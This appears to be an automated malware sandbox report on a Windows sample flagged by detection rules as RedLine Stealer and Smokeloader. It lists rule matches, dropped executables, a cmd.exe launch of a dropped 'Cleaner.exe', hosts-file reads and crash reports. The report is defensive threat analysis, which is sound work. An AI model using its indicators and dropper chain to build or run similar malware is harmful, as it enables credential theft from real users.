Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C28C2	33_2_00007FFBB00C28C2
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C2EE5	33_2_00007FFBB00C2EE5
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C1B2E	33_2_00007FFBB00C1B2E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00CA91D	33_2_00007FFBB00CA91D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C394F	33_2_00007FFBB00C394F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C553E	33_2_00007FFBB00C553E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C3F72	33_2_00007FFBB00C3F72
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C9B6D	33_2_00007FFBB00C9B6D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C678F	33_2_00007FFBB00C678F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C57D8	33_2_00007FFBB00C57D8
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C4601	33_2_00007FFBB00C4601
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C4EDD	33_2_00007FFBB00C4EDD

PE file contains executable resources (Code or Archives)

Source: file.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568

Source: Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winEXE@17/52@1/5

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source:	Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Binary contains a suspicious time stamp

Source: Cleaner.exe.0.dr

Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]			Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
